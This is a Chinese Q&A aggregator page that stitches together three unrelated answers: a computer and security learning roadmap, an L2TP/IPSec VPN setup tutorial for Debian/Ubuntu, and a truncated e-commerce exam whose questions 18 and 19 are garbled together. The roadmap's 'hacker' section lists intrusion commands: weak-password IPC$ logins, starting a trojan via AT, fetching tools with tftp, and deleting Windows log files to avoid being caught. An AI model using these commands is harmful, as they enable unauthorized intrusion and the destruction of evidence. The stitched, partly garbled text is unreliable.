導航:首頁 > 源碼編譯 > xl2tpd源碼

xl2tpd源碼

發布時間:2022-01-25 23:34:35

Ⅰ 請問我應該怎樣學習電腦

基礎:
如何去學習
·要有學習目標
·要有學習計劃
·要有正確的心態
·有很強的自學能力

學習目標
·1.明確自己的發展方向(你現在或者將來要做什麼,程序員?安全專家?網路黑客等)
·2.自己目前的水平和能力有多高
·能簡單操作windows2000
·能簡單配置windows2000的一些服務
·能熟練的配置Windows2000的各種服務
·能熟練配置win2000和各種網路設備聯網
·能簡單操作linux,Unix,Hp-unix, Solaris中的一種或者多種操作系統
·能配置cicso,huawei,3com,朗迅等網路設備
·會簡單編寫C/C++,Delphi,Java,PB,VB,Perl
·能簡單編寫Asp,Php,Cgi和script,shell腳本

·3.必須學會不相信態度,尊重各種各樣的能力
·不要為那些裝模做樣的人浪費時間
·尊重別人的能力,
·會享受提高自己能力的樂趣.
·在知道了自己的水平和能力之後就要開始自己的目標了
·--------安全專家
·--------黑客
·--------高級程序員
·黑客是建設網路,不是破壞�? 破壞者是駭客;
·黑客有入侵的技術,但是他們是維護網路的,所以和安全專家是差不多的;
·因為懂得如何入侵才知道如何維護
·因為懂得如何維護才更要了解如何入侵
·這是 黑客與安全專家的聯系
·但,他們都是在會編程的基礎上成長的!
·下面我們開始我們的學習計劃!

學習計劃
有了學習計劃才能更有效的學習

安全學習計劃
不奢求對win98有多麼精通,我們也不講解win98如何應用,如何精通,我們的起步是win2000 s
erver,這是我們培訓的最低標准,你對英語有一定的了解也是必不可少

最基礎
·a.會裝win2000,知道在安裝的時候有兩種分區格式,NTFS與FAT32 及他們的區別,知道win2
000可以在安裝的時候分區,格式化硬碟, 可以定製安裝,可以定製自己需要安裝的一些組件
,如果有網路適配器,可以直接加入域中 學習點:NTFS和FAT32分區的不同 各個組件的作用
域的定義
·b.知道如何開,關機 知道注銷的用處
·c.知道win2000下面各主要目錄的作用 Documents and Settings,WINNT,system32 Progra
m Files
·d.知道管理工具裡面各個組件的定義
·e.學會應用命令提示符cmd(dos)
·f.知道計算機管理裡面的各個選項的不通
·g.知道win2000強大的網路管理功能
·h.能非常熟練的操作win2000
·i.知道IP地址,子網掩碼,網關和MAC的區別

進階
·A.配置IIS,知道各個選項的作用
·B.配置DNS,DHCP
·C.配置主控制域,輔助域
·D.配置DFS
·E.配置路由和遠程訪問

·F.配置安全策略IPSEC
·G.配置service(服務)
·H.配置磁碟管理,磁碟分額
·i. 配置RAID(0,1,0+1,5)
·J.路由器的安裝與簡單配置
·K.交換機的安裝與簡單配置
·L.常見的VPN,VLAN,NAT配置
·M.配置常見的企業級防火牆
·N.配置常見的企業級防病毒軟體

高級
·之前我們學到的是任何一個想成為網路安全專家和黑客基本知識中的一部分
·你作到了嗎??
·如果你做到了,足以找到一份很不錯的工作!

配置負載均衡
·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+負載均衡+ASP(PHP.CGI)+CHECK PIONT(ISA
SERVER) ·
·配置三層交換網路 ·
·配置各種復雜的網路環境
·能策劃一個非常完整的網路方案 ·
·能獨自組建一個大型的企業級網路 ·

·能迅速解決網路中出現的各種疑難問題

結束
·在你上面的都學好了,你已經是一個高級人才了,也是我們VIP培訓的目標!
·可以找到一份非常好的工作
·不會再因為給女朋友買不起玫瑰而發愁了!

安全:
導讀
·系統安全服務(SYSTEM)
·防火牆系統(FIREWALL)
·入侵檢測(IDS)
·身份驗證(CA)
·網站監控和恢復(WEBSITE)
·安全電子商務(E-BUSINESS)
·安全電子郵件(E-MAIL)
·安全辦公自動化(OA)
·Internet訪問和監控(A&C)
·病毒防範(VIRUS)
·虛擬區域網(VPN)

系統安全服務

·系統安全管理
·系統安全評估
·系統安全加固
·系統安全維護
·安全技能學習

系統安全管理
·信息系統安全策略
·信息系統管理員安全手冊
·信息系統用戶安全手冊
·緊急事件處理流程

系統安全評估
1、系統整體安全分析
· 分析用戶的網路拓撲結構,以找出其結構性及網路 配置上存在的安全隱患。
· 通過考察用戶信息設備的放置場地,以使得設備物理上是安全的。
· 分析用戶信息系統的管理、使用流程,以使得系統 能夠安全地管理、安全地使用
2、主機系統安全檢測
· 通過對主機進行安全掃描,以發現系統的常見的安全漏洞。
· 對於特定的系統,採用特別的工具進行安全掃描。
· 根據經驗,對系統存在的漏洞進行綜合分析。
· 給出系統安全漏洞報告。

· 指出各個安全漏洞產生的原因以及會造成的危險。
· 給出修復安全漏洞的建議
3、網路設備安全檢測
· 通過對網路進行安全掃描,以發現網路設備的安全漏洞。
· 根據經驗,對網路設備存在的漏洞進行綜合析。
· 給出網路設備安全漏洞報告。
· 指出各個安全漏洞產生的原因以及會造成的險。
· 給出修復安全漏洞的建議。

安全系統加固
·為用戶系統打最新安全補丁程序。
·為用戶修復系統、網路中的安全漏洞。
·為用戶去掉不必要的服務和應用系統。
·為用戶系統設置用戶許可權訪問策略。
·為用戶系統設置文件和目錄訪問策略。
·針對用戶系統應用進行相應的安全處理。

安全系統維護
·防火牆系統維護,安全日誌分析
·IDS系統維護,安全日誌分析
·VPN系統維護,安全日誌分析
·認證系統維護,安全日誌分析

·伺服器、主機系統,安全日誌分析
·其它各類安全設施維護及日誌分析

安全技能培訓
·網路安全基礎知識
·網路攻擊手段演示和防範措施
·防火牆的原理和使用
·VPN的原理和使用
·漏洞掃描工具的原理和使用
·IDS(入侵檢測系統)的原理和使用
·身份認證系統的原理和使用
·防病毒產品的原理和使用
·系統管理員安全培訓
·一般用戶安全培訓

防火牆系統
·防火牆的定義
·防火牆的分類
·包過濾防火牆
·應用網關防火牆
·狀態檢測防火牆
·一般企業防火牆配置

·政府機構防火牆配置
·涉密網路保密網關配置
·高可用性和負載均衡防火牆系統
·高速防火牆系統

防火牆的定義
·用以連接不同信任級別網路的設備。
·用來根據制定的安全規則對網路間的通信進行控制

防火牆的分類
·包過濾 (Packet Filters)
·應用網關 (Application Gateways)
·狀態檢測(Stateful Inspection)

包過濾防火牆
·包 過 濾 技 術
·主要在路由器上實現,根據用戶定義的內容(如IP地址、埠號)進行過濾。包過濾在網
絡層進行包檢查與應用無關。
· 優 點
· 具有良好的性能和可伸縮性。
· 缺點
· 由於包過濾技術是對應用不敏感的,無法理解特定通訊的含義,因而安全性很差。

應用網關防火牆
·應用網關技術
·第二代防火牆技術,其在應用的檢查方面有了較大的改進,能監測所有應用層,同時對應
用「內容」(Content Information)的含義引入到了防火牆策略的決策處理。
· 優點
· 安全性比較高。
· 缺點
· 1、該方法對每一個請求都必須建立兩個連接,一個從客戶端到防火牆系統,另一個從
防火牆系統到伺服器,這會嚴重影響性能。
· 2、防火牆網關暴露在攻擊者之中。
· 3、對每一個代理需要有一個獨立的應用進程或 daemon 來處理, 這樣擴展性和支持
新應用方面存在問題。

檢測狀態防火牆
· 屬第三代防火牆技術,克服了以上兩種方法的缺點,引入了OSI全七層監測能力,同時
又能保持 Client/Server的體系結構,也即對用戶訪問是透明的。
· 防火牆能保護、限制其他用戶對防火牆網關本身的訪問。
· 狀態檢測技術在網路層截獲數據包後交給INSPECT Engine,通過 INSPECT Engine 可以
從數據包中抽取安全決策所需的所有源於應用層中的狀態相關信息,並在動態狀態表中 維
持這些信息以提供後繼連接的可能性預測。該方法能提供高安全性、高性能和擴展性、高伸
縮性的解決方案。

入侵檢測系統
·處理攻擊時遇到的典型問題
·解決入侵的方法和手段
·基於網路的入侵檢測
·基於主機的入侵檢測
·入侵檢測系統典型配置

處理攻擊時遇到的問題
·獲得的信息不足
·不知到網路上發生了什麼事。
·無法判定系統是否已經被入侵。
·信息不準確
·人員少
·沒有足夠的人員維護管理。
·缺乏規范的處理程序
·發現攻擊時如何反應?
·下一步該如何處理?

解決入侵的方法和手段
·採用入侵實時入侵監控系統(IDS)
·對系統、網路中發生的事件進行實時監控。

·當發生入侵事件時能即時反應。
·對入侵事件進行詳細記錄並跟蹤。

基於主機的入侵檢測
·軟體模塊安裝在包含有重要數據的主機上
·監視操作系統的日誌以發現攻擊的特徵。
·監視代理所處主機上的所有進程和用戶.
·監視暴力登錄攻擊(brute-force login), 試圖改變或繞過安全設定,及特權的濫用等

·當新的日誌產生時,為了減小對CPU的影響,代理程序暫時中斷。

基於網路的入侵檢測
·軟體安裝在專門的主機上,放置於關鍵的網段
·將配置該軟體主機的網卡設置為混雜模式,使得該主機能接受網段上所有的包。
·分析數據包以判斷是否有黑客攻擊。
·監視網段上的所有數據。
·對網路的流量無任何影響。
·能檢測到 denial of service attacks, unauthorized access attempts, pre-attack s
cans等攻擊。

身份認證系統
·用戶身份認證的方法

·不同認證方法的安全級別
·用戶身份認證的常用方式
·解決問題的方法
·目前比較成熟的雙因素認證方法

用戶身份驗證
·你知道的一些東西
· 密碼, 身份證號,生日
·你有的一些東西
· 磁卡, 智能卡,令牌, 鑰匙
·你獨有的一些東西
· 指紋,聲音,視網膜

密碼是不安全的
·可以破解密碼的工具太多
·大多密碼在網路中是明文傳輸的
·密碼可以網路離線時被窺測
·密碼和文件從PC和伺服器上被轉移了
·好記的密碼容易被猜到,不易猜測的密碼又太難記

解決方法
·使用混合的工具:如IC卡+PIN

網站監控與恢復系統
·典型的Web伺服器應用
·Web伺服器存在的安全問題
·網站安全解決方法

典型web伺服器應用
·Internet-->路由器-->防火牆-->web站點
· |
· |
· 內部網
·所有的放在防火牆後面

Web伺服器存在的安全問題
· 網頁被非法篡改是網站內容提供者最頭痛的問題。在採用防火牆後,Web伺服器本身的漏
洞成為了網站被黑的主要問題。
· Web應用伺服器(如IIS,Apache中存在著大量的安 全漏洞.)
· 用戶自己開發的CGI、ASP、PHP應用中存在著大量潛在的漏洞。

網站安全
·採用Web伺服器監控與恢復系統

·該系統提供對網站文件內容的實時監控,發現被改動後立即報警並自動恢復。

電子商務安全系統
·典型的電子商務應用
·電子商務中存在的安全問題
·電子商務的安全解決方法
·實時數據交換系統

典型電子商務應用
·Internet--->防火牆--->Web伺服器
· || |
· || |
· 內部網(資料庫)

電子商務中存在的安全問題
·1、Web伺服器端
·Web應用伺服器(如IIS、Apache中存在著大量的安全漏洞。用戶自己開發的CGI、ASP、PH
P應用中存在著潛在的漏洞。
· 黑客通過這些漏洞攻擊Web伺服器,可非法篡改網頁,造成惡劣影響,動搖了電子商務使
用者的信心。
· 甚至可獲得Web伺服器上大量的敏感資料,如用戶的信用卡號,用以連接內部資料庫的帳
號和口令。

· 可能通過控制Web伺服器,來攻擊內部資料庫。

電子商務中存在的安全問題
·2、SSL協議
·SSL加密強度低。由於瀏覽器默認的加密模塊只支持40位的低強度加密,而且即使在瀏覽
器中安裝更高位的加密模塊,由於WEB伺服器不提供對高位SSL鏈接的支持同樣無法實現高強
度SSL加密鏈接。
· 無法解決電子商務中的用戶簽名。SSL鏈接建立WEB伺服器和用戶瀏覽器之間的安全通道
只能保證在安全通道內的信息不被竊聽或篡改,並不能對用戶發送的信息進行簽名以保證信
息的有效性和不可抵賴性,而這正是電子商務中必須解決的問題。

電子商務的安全解決方法
·將WEB伺服器分為兩部分:一般內容的WEB伺服器和交易WEB伺服器。
· 一般內容的WEB伺服器放置在DMZ區內,採用WEB站點監控和恢復系統保護,防止主頁被非
法改動。
· 交易WEB伺服器放置在內部網內,通過一台物理分隔的實時數據交換系統將其與DMZ區相
連。
· 在客戶機和伺服器端安裝SSL代理,從而獲得128位的高強度加密通道

實時數據交換系統
·將系統外部 Web伺服器和內部應用Web伺服器物理隔開.
·外部Web伺服器用於存放一般的信息,內部Web服 務器用於存放敏感信息,並和內部數據

庫連接。
·外部用戶通過http訪問位於DMZ區內的一般Web伺服器。
·當進行交易時,用戶需訪問位於內部網內的應用伺服器。
·https連接首先到達實時數據交換系統的虛擬外部Web伺服器,實時數據交換系統將https
協議解開,只將https連接的數據內容拷貝到虛擬內部Web伺服器,虛擬內部Web伺服器將使
用該數據重新發起https連接到實際的內部應用Web伺服器.
·內外通過實時數據交換系統進行數據交換,無任何協議和連接穿過實時數據交換系統。
·即使DMZ區的Web伺服器受到攻擊, 攻擊者也的不到任何有用的信息

安全電子郵件系統
·電子郵件的安全問題
·安全電子郵件的解決方法
·一個安全郵件的使用過程

電子郵件的安全問題
·如何保證發送的敏感信息不被泄漏
·如何保證發送的信息不被篡改
·如何確認發件人的真實身份
·如何防止發件人的抵賴行為

安全電子郵件的解決方法
·將PKI體系應用到郵件系統中

·郵件的加密和解密以實現數據的保密。
·郵件的數字簽名(鑒別)實現發件人認證和不可抵賴。
·完整性校驗功能防止信息傳輸過程中被篡改可*的安全性。
·採用公開密鑰和對稱密鑰相結合的密鑰體系。
·支持128bit對稱密鑰演算法和1024bit公開密鑰演算法。

辦公自動化系統的安全問題
· 如何保證發送的敏感信息不被泄漏
· 如何保證發送的信息不被篡改
· 如何確認發件人的真實身份
· 如何防止發件人的抵賴行為

安全辦公自動化系統的解決方法
·將PKI體系應用到辦公自動化系統中
·工作流信息的加密和解密以實現數據保密
·工作流信息的數字簽名(鑒別)實現發件人認證和不可抵賴。
·完整性校驗功能防止信息傳輸過程中被篡改可*的安全性。
·採用公開密鑰和對稱密鑰相結合的密鑰體系
·支持128bit對稱密鑰演算法和1024bit公開密鑰演算法。

Internet訪問及控制系統
·Internet使用存在的問題

·Internet使用的解決方法
·內容緩存系統
·Internet站點過濾系統

Internet訪問存在的問題
·Internet接入帶寬不足,訪問比較慢。
·大量的用戶訪問相同的內容,造成帶寬的進一步擁擠。
·在上班時間里大量的Internet訪問是與業務無關的。
·有人使用公司的Internet系統訪問色情網站。
·有人使用公司的Internet系統訪問反動站點。
·管理人員無法知道Internet系統的使用情況。

Internet訪問的解決方法
· 對於問題一,採用內容緩存系統。
· 對於問題二,採用Internet 站點過濾系統。

內容緩存系統
·1、Client 發起http連接請求
·2、Proxy 收到請求後將檢查內部緩存內是否有所需內容,若有,則返還給Client。
·3、若無,則Proxy根據請求向目的伺服器發起請求。
·4、Web伺服器將內容返回到Proxy伺服器。
·5、Proxy伺服器將得到的內容發回給Client,並在自己的緩存中保存一份。

Internet站點過濾系統 (一)
·1、Client 發起http連接請求
·2、連接到達防火牆時防火牆將URL送到WebSense Server 檢查。
·3、WebSense 將審查結果返回到防火牆。
·4、防火牆根據其策略決定是否讓該連接通過。
Internet站點過濾系統 (二)
·1、Client 發起http連接請求
·2、Proxy 受到請求後將URL送到WebSense Server檢查。
·3、Proxy根據返回的結果決定是否接收該連接請求。

病毒防範系統
· 互連網時代對防病毒系統的要求
· 計算機病毒解決方法
· 典型病毒防範系統部署

互聯網時代對防病毒系統的要求
· 由於計算機的聯網使用,使得病毒傳播的途徑大為增多:網路文件共享、電子郵件、Int
ernet文件下載,傳播速度也大為加快。
· 新病毒的出現速度加快,用戶的防病毒軟體的病毒特徵碼沒能及時更新。
· 目前已出現了惡意的Java、ActiveX,當使用者瀏覽到包含這些代碼的網頁時,會造成安
全問題。

· 一些來歷不明的電子郵件程序或下載的程序中帶有特洛依木馬,可能會造成受害者的主
機被他人控制。

計算機病毒解決方法
· 從系統的觀點考慮病毒的防範,在所有病毒傳輸的途徑上均配置防病毒軟體,如客戶端
(Win98、 · Win2000)、文件伺服器(NT、Netware)、郵件伺服器(Exchange、Lotus
Notes)、Internet接入系統(Proxy、Firewall)等。
· 整個病毒防範系統採用集中管理的方式,病毒特徵碼統一更新,安全策略集中設定,從
而使得整個網路系統的病毒特徵碼得到快速更新。
· 通過在客戶端的瀏覽器和Proxy、Firewall中嵌入病毒檢查軟體,來防範下在程序中帶有
的病毒和可能的惡意Java、ActiveX等可執行代碼的攻擊。

VPN(虛擬私有網)
· 數據加密分類
· 物理線路加密
· 數據鏈路加密
· 網路層加密—IPSec
· 傳輸層加密—SSL

數據加密類型
·物理層->物理層 物理線路加密
·數據鏈路層->數據鏈路層 (路由器訪問)

·在數據鏈路層(如PPP)進行加密 L2TP、PPTP、L2F
·網路層->網路層(路由器 防火牆 主機)
·在網路層 (如IP)進行加密 IPSec
·傳輸層->傳輸層 (對TCP進行加密 SSL)
·應用層->應用層(在應用層 (如TCP)進行加密 S/MIME、SET、SSH)

物理線路加密
· DDN 加密機
· 幀中繼加密機
· 非同步撥號Modem
· ISDN線路密碼機
· ATM加密機

注:傳輸層加密
·Secure Sockets Layer (SSL) 是一個端到端的Internet 安全協議,通過採用數字證書,
它提供了數據加密、身份認證的功能。SSL建立在傳輸層,它為客戶機和伺服器在應用級建
立起一個端到斷的安全會話。
·SSL代理—128位的高強度加密模塊

結束語·恭喜你:
·學完這些並且可以熟練應用,已經是一個真正的網路安全專家了!
·希望此時的你旁邊有個溫柔稍有點調皮的女朋友,為這孤獨而寂寞的網路添加一點跳動的

色彩!

黑客編:
必須要掌握的幾個命令
·Net
·netsh
·Ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping

必須要掌握的幾個協議
·http
·dns
·ftp
·Pop
·Smtp

·Icmp
·Udp
·tcp

開始
·掌握了黑客攻擊的方式和手段後,那麼學習黑客就簡單多了!
·因為你掌握了這些,剩餘的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具

高級
·自己編寫專用的黑客工具
·自己發現系統漏洞

黑客入侵手段
·收集信息:
· 收集要入侵的目標信息
· IP,域名,埠,漏洞,位置

弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip 「password」 /user:user
·如果目標機開3389服務,可以直接連接

·在sql的sa弱口令,可以用sql連接器直接 ·登陸

後門木馬
·如果有ipc$共享,可以過去木馬後門
·用at啟動
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·Tftp.exe –i ip get *.* *.*
·然後直接安裝 ·如果有3389,可以自己建一個iis,下載 直接運行

密碼破解
·遠程破解mysql,mssql,ftp,mail,共享密碼
·本地破解管理員(administrator)密碼

緩沖溢出
·可以用緩沖溢出攻擊,
·比如流行的webdev,rdcom模塊漏洞
·可以直接得到system管理許可權
·緩沖溢出後的一般現象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>

Web服務漏洞
·例如:
·Unicode漏洞遍歷磁碟和執行程序
·二次編碼漏洞遍歷磁碟和執行程序
·.HTR漏洞查看源代碼

嗅探監聽
·例如:
·針對web監聽
·針對mail監聽
·工具如:sinffer , iris

欺騙攻擊
·例如:
·運用arp欺騙攻擊

偽裝欺騙
·常見的如:mail病毒
·把一個文件改名字甚至圖標,欺騙對方執行

社會工程學

·例如:
·QQ聊天誘惑
·EMAIL信息
·電話
·誘惑

拒絕服務
·例如:
·Dos攻擊
·Ddos攻擊

利用跳板
·利用自己的肉雞作為跳板攻擊別的機器
·My PC------>跳板(肉雞)--->目標

路由器漏洞
·如:
·原始密碼
·程序漏洞

防火牆
·利用欺騙攻擊防火牆,導致防火牆功能失效

·利用防火牆的模塊漏洞

unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·這些目前先不講解

精通黑客工具
·必須有一套自己可以完全掌握的黑客工具
·如埠掃描 Nscan,bluescanport
·監聽工具:sinffer iris
·telnet工具:nc
·掃描工具:sss,nmap, LANguard
·後門工具:radmin,winshell
·密碼破解:lc4
·遠程管理:pcanywhere
·會使用各種經典的黑客工具

清除日誌
·在你入侵機器以後,離開的時候,要完全清除
·自己在那台機器上留下的痕跡
·例如清除
·Del C:\WINNT\system32\LogFiles\*.*

·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt

如果你不清除日誌
·當目標機器的管理員發現你的證據
·完全可以讓你在大牆內渡過一段日子

黑客
·當你完全掌握這些後
·你就成為了一名小黑客

高級
·編寫自己的黑客工具
·發現系統漏洞

高級黑客
·目前你足以成為一個高級黑客了

真正的黑客
·精通各種網路協議

·精通操作系統
·精通編程技術
·精通安全防護
·不搞破壞
·挑戰技術難題

結束
·想學好這些,並不是*別人給你的,而是*自己的努力,自己的自學得到的!
·別人只能指導你,怎麼去做,只能告訴方法,
·真正的實施是你自己,經過N*N個日夜努力換來的

Ⅱ 如何在 Debian / Ubuntu 伺服器上架設 L2TP / IPSec VPN

首先解釋一個問題:在 iPhone 的 VPN 設置介面里(Settings >> General >> Network >> VPN),你可以看到三個標簽:L2TP, PPTP, IPSec。但上面我們又講本次介紹的 VPN 方式叫「L2TP / IPSec」,這兩者究竟是什麼關系?

這三個標簽確實令人混淆,准確的寫法應該是:L2TP over IPSec, PPTP, Cisco IPSec。PPTP 跟另外兩者關系不大,且大家較為熟悉,暫且不提,L2TP 和 IPSec 的區別如下。

L2TP:一個「包裝」協議,本身並不提供加密和驗證的功能。

IPSec:在 IP 數據包的層級提供加密和驗證功能,確保中間人無法解密或者偽造數據包。

本來,只用 IPSec 就可以實現 VPN,Mac OS X 和 Linux 都支持。但是 Mac OS X 和 iPhone OS 都推薦使用 L2TP over IPSec,在兩者的圖形介面上也只能設置這個。L2TP / IPSec 是業界標准,微軟也支持。而只用 IPSec 的常見於 Linux-to-Linux 的應用,比如將兩個位於不同地區的辦公室網路安全地連在一起。這多是固定 IP 路由器到固定 IP 路由器級別的連接,只需保證數據包不被中途截獲或者偽造就可以,故使用 L2TP 的意義不大。L2TP / IPSec 主要是實現所謂「Road Warrior」的設置,即用變動的客戶端連固定的伺服器。

Cisco 的 VPN 用的也是 IPSec 加密,但那是一套不同於 L2TP 的私有包裝協議,用於提供用戶管理之類的功能,因此一般都需要用 Cisco 自家的 VPN 客戶端連接。iPhone / iPad 的 VPN 設置介面中的 IPSec 標簽里有 Cisco 的標識,就是這個原因。

以下是在 Ubuntu 和 Debian 主機上架設 L2TP / IPSec VPN 的步驟,一共十四步。你需要有伺服器的 root 許可權(所以 DreamHost, BlueHost, MediaTemple 這些服務供應商幫你把一切打點周到的主機就無緣了),也需要一些基本的 Linux 知識。不然的話,我們還是推薦您找一位比較熟技術的朋友幫忙。

一、安裝 IPSec。如上所述,IPSec 會對 IP 數據包進行加密和驗證。這意味著你的電腦 / 移動設備與伺服器之間傳輸的數據無法被解密、也不能被偽造。我推薦用 openswan 這個後台軟體包來跑 IPSec。

用以下命令安裝 openswan:

sudo aptitude install openswan二、用文字編輯器打開 /etc/ipsec.conf,改成這樣:

version 2.0
config setup
nat_traversal=yes
virtual_private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12
oe=off
protostack=netkey

conn L2TP-PSK-NAT
rightsubnet=vhost:%priv
also=L2TP-PSK-noNAT

conn L2TP-PSK-noNAT
authby=secret
pfs=no
auto=add
keyingtries=3
rekey=no
ikelifetime=8h
keylife=1h
type=transport
left=YOUR.SERVER.IP.ADDRESS
leftprotoport=17/1701
right=%any
rightprotoport=17/%any三、用文字編輯器打開 /etc/ipsec.secrets,改成這樣:

YOUR.SERVER.IP.ADDRESS %any: PSK "YourSharedSecret"(別忘了把「YOUR.SERVER.IP.ADDRESS」這部分換成你的伺服器的 IP 地址,把「YourSharedSecret」部分換成隨便一個字串,例如你喜歡的一句話,等等。)

四、運行以下命令:

for each in /proc/sys/net/ipv4/conf/*
do
echo 0 > $each/accept_redirects
echo 0 > $each/send_redirects
done五、檢查一下 IPSec 能否正常工作:

sudo ipsec verify如果在結果中看到「Opportunistic Encryption Support」被禁用了,沒關系,其他項 OK 即可。

六、重啟 openswan:

sudo /etc/init.d/ipsec restart七、安裝 L2TP。常用的 L2TP 後台軟體包是 xl2tpd,它和 openswan 是同一幫人寫的。

運行以下命令:

sudo aptitude install xl2tpd八、用文字編輯器打開 /etc/xl2tpd/xl2tpd.conf,改成這樣:

[global]
ipsec saref = yes

[lns default]
ip range = 10.1.2.2-10.1.2.255
local ip = 10.1.2.1
;require chap = yes
refuse chap = yes
refuse pap = yes
require authentication = yes
ppp debug = yes
pppoptfile = /etc/ppp/options.xl2tpd
length bit = yes這里要注意的是 ip range 一項里的 IP 地址不能和你正在用的 IP 地址重合,也不可與網路上的其他 IP 地址沖突。

九、安裝 ppp。這是用來管理 VPN 用戶的。

sudo aptitude install ppp十、檢查一下 /etc/ppp 目錄里有沒有 options.xl2tpd 這個文件,沒有的話就建一個,文件內容如下:

require-mschap-v2
ms-dns 208.67.222.222
ms-dns 208.67.220.220
asyncmap 0
auth
crtscts
lock
hide-password
modem
debug
name l2tpd
proxyarp
lcp-echo-interval 30
lcp-echo-failure 4注意 ms-dns 兩行我填的是 OpenDNS。如果你想用其他的 DNS 伺服器(例如谷歌的公共 DNS),請自行更換。

十一、現在可以添加一個 VPN 用戶了。用文字編輯器打開 /etc/ppp/chap-secrets:

# user server password ip
test l2tpd testpassword *如果你之前設置過 PPTP VPN,chap-secrets 文件里可能已經有了其他用戶的列表。你只要把 test l2tpd testpassword * 這樣加到後面即可。

十二、重啟 xl2tpd:

sudo /etc/init.d/xl2tpd restart十三、設置 iptables 的數據包轉發:

iptables --table nat --append POSTROUTING --jump MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward十四、因為某種原因,openswan 在伺服器重啟後無法正常自動,所以我們可以在 /etc/rc.local 文件里寫入如下語句:

iptables --table nat --append POSTROUTING --jump MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
for each in /proc/sys/net/ipv4/conf/*
do
echo 0 > $each/accept_redirects
echo 0 > $each/send_redirects
done
/etc/init.d/ipsec restart到這里,設置工作已經基本完成。你可以用 iPhone 或 iPad 試著連一下。記得在「Secret」中填入你在上述第三步里填的 YourSharedSecret。

如果連接成功,上網也沒問題的話,恭喜你,大功告成。如果連不上,恐怕還得多做一步。

Ubuntu 9.10 自帶的 openswan 版本是 2.6.22, Debian Lenny 帶的版本是 2.4.12。這兩個版本的 openswan 都有問題。我們的測試結果表明,2.6.24 版的 openswan 可以在上述兩版的 Linux 操作系統下正常工作。所以如果做完以上十四步還是連不上的話,請考慮從源碼編譯 openswan 2.6.24

Ⅲ 電子商務網站建設等級考試題《能做及格的給200分》

一、單項選擇題(本大題共20小題,每小題1分,共20分)在每小題列出的四個選項中只有一個選項是符合題目要求的,請將正確選項前的字母填在題後的括弧內。
1.在通常意義上,電子商務所涉及的商務活動是()
A.通過自動化通信手段進行的 B.在Internet上進行的
C.使用電子方式進行的D.在專用網上進行的
2.當前使用的第四版本的IP地址有()
A.2個位元組B.3個位元組C.4個位元組D.5個位元組
3.CGI作為標准介面,連接的是Web伺服器和()
A.客戶端的應用程序 B.伺服器端的應用程序
C.瀏覽器 D.Web伺服器
4.區域網交換機可以在交換機上進行物理網段的劃分,即將不同的物理埠劃分為不同的廣播域,這種技術稱為()
A.虛擬區域網(VLAN) B.SAN
C.Web CacheD.虛擬專用網(VPN)
5.網橋用於連接兩個或多個物理網段,可以稱得上是一種真正意義上的網路互聯設備。它主要進行幀的存儲和轉發,工作在OSI參考模型中的()
A.物理層B.網路層 C.應用D.數據鏈路層
6.在網站信息系統和網路中用於傳送商貿業務單證的信息形式稱為()
A.報文?B.記錄 C.單證D.文件
7.HTTPS使用的是()
A.SSH的HTTPB.Security的HTTP
C.TCP的HTTPD.SSL的HTTP
8.可視化設計最重要的是確定網站的()
A.信息結構B.頁面內容C.目錄D.頁面布局
9.在一個路由器中可以同時配置多種不同的路由。其中通常具有默認最高優先順序的是()
A.源路由B.透明路由C.靜態路由D.動態路由
10.通常提供第一層訪問控制的訪問控制策略是()
A.入網訪問控制 B.網路的許可權控制
C.屬性安全控制 D.目錄級安全控制
11.SSL協議工作在()
A.HTTP協議層 B.Socket層C.物理層 D.Web協議層
12.基於主機的入侵檢測系統(IDS)的實現手段主要是()
A.檢索行為特徵B.監視安全日誌
C.跟蹤程序行為 D.掃描報文序列
13.ISP是指()
A.基礎網路運營商 B.應用服務提供商
C.Internet內容提供商 D.Internet服務提供商
14.我國中文域名注冊管理機構是()
A.ChinaDNS B.CNNICC.NSI D.InterNIC
15.與HTML相比,XML著重描述Web頁面的()
A.內容B.整體風格 C.顯示格式D.構圖方法
16.以下不屬於災難恢復操作的是()
A.全盤恢復B.重定向恢復
C.個別文件恢復D.資料庫恢復

17.「隧道」技術的基本內容是()
A.封裝 B.IPv6C.NATD.IP-Sec
18.最早提出病毒概念的是()
A. Turing重要的安全事件來檢測入侵的安全技術稱為()
A.流量統計B.審計追蹤C.入侵陷阱D.入侵捕獲
20.由計算機愛好者們通過Internet協同開發出來的,加入了GNU並遵循公共版權許可證(GPL),秉承「自由的思想,開放的源碼」的原則的操作系統是()
A.UNIX B.Net WareC.Windows 2000D.Linux
二、多項選擇題(本大題共10小題,每小題2分,共20分)在每小題列出的五個選項中有二至五個選項是符合題目要求的,請將正確選項前的字母填在題後的括弧內。多選、少選、錯選均無分。
21.防火牆的作用是保護內部網路的安全,但是它不能()
A.防止來自內部的互相攻擊B.控制對特殊站點的訪問
C.控制用戶的非法訪問D.防止數據驅動式攻擊
E.防止感染病毒的文件的傳播
22.從分配演算法角度進行劃分,負載均衡可以分為()
A.靜態負載均衡 B.細粒度負載均衡
C.中粒度負載均衡 D.粗粒度負載均衡
E.動態負載均衡
23.信息加工的內容包括()
A.信息發布B.整理關鍵詞 C.信息分類
D.信息搜集E.信息查詢
24.電子商務網站的開發流程包括()
A.域名申請注冊B.建立主機並確定主機位置C.硬體選擇
D.軟體選擇 E.網站開發和推廣
25.屬於網路信息安全傳輸協議的有()
A.VPNB.SETC.HTTP
D.SSLE.S-HTTP
26.選擇路由演算法需要綜合考慮的因素有()
A.最優化 B.簡潔性 C.堅固性
D.快速收斂 E.靈活性
27.可以由Internet管理機構分配使用的IP地址類型包括()
A.A類地址B.B類地址C.C類地址
D.D類地址E.E類地址
28.由Microsoft公司提供的電子商務方案產品有()
A.Commerce Server 2000 B.i.Sell
C.MarketMakerD.BizTalk Server 2000
E.WebSphere
29.電子商務網站按其實現的技術可分為()
A.平台網站 B.自建網站
C.商務信息網站 D.租用空間形式的網站
